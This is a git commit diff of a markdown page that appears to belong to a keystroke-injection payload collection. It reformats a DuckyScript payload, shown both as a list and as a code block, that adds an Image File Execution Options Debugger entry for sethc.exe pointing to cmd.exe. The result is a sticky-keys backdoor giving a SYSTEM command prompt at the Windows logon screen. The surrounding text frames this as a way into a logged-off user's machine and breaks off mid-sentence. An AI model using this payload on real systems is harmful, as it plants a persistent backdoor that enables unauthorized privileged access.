Updated Attacking Windows At The Logon Screen, Gaining Access To CMD With System Privileges. (markdown)

This commit is contained in:
epiquiem 2014-10-04 16:24:52 -07:00
parent 3e30e81899
commit 78f2643857
1 changed files with 12 additions and 13 deletions

View File

@ -4,19 +4,18 @@ This command prompt will close automatically due to the way this hack works (aft
This hack does require pre work and does require administrator privileges to modify the registry.
### Pre work
***
* DELAY 400
* ESCAPE
* DELAY 200
* CONTROL ESCAPE
* DELAY 750
* STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
* DELAY 750
* CTRL-SHIFT ENTER
* DELAY 1000
* ALT y
```
DELAY 400
ESCAPE
DELAY 200
CONTROL ESCAPE
DELAY 750
STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
DELAY 750
CTRL-SHIFT ENTER
DELAY 1000
ALT y
```
Left Alt + Left Shift + Print Screen to access the prompt.
Ok so that's the pre work done now when the users machine is logged off and you want to be able to execute commands or even if you just want to be able to execute commands as the system not as administrator all you need to do is press